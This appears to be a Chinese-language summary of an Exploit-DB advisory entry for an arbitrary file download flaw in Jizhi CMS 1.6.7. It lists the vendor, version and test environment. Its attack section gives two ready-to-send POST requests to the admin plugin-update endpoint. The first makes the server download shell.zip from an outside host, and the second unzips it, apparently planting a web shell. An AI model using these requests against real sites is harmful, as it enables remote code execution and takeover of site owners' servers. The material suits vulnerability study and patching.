从这个网页截图中,可以获取到以下关于漏洞的关键信息: 漏洞概述 漏洞名称: Jizhi CMS 1.6.7 - Arbitrary File Download EDB-ID: 48361 CVE编号: N/A 漏洞类型: WebApps 漏洞作者: Jizhicms 漏洞平台: PHP 日期: 2020-04-21 漏洞细节 漏洞作者: iej1ctkig 厂商主页: https://www.jizhicms.cn/ 软件链接: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip 测试版本: 1.6.7 测试环境: Mac OS 攻击细节 Data 1. URL: /admin.php/Plugins/update.html Host: 192.168.1.253:8888 Content-Length: 86 Post Data: action=start-download&filepath=shell&download_url=http://192.1.234.130:9090/shell.zip Data 2. URL: /admin.php/Plugins/update.html Host: 192.168.1.253:8888 Content-Length: 32 Accept Headers: application/json, text/javascript Post Data: action=file-upzip&filepath=shell 其他信息 标签: [空白] 来源链接: [空白] 验证状态: 未验证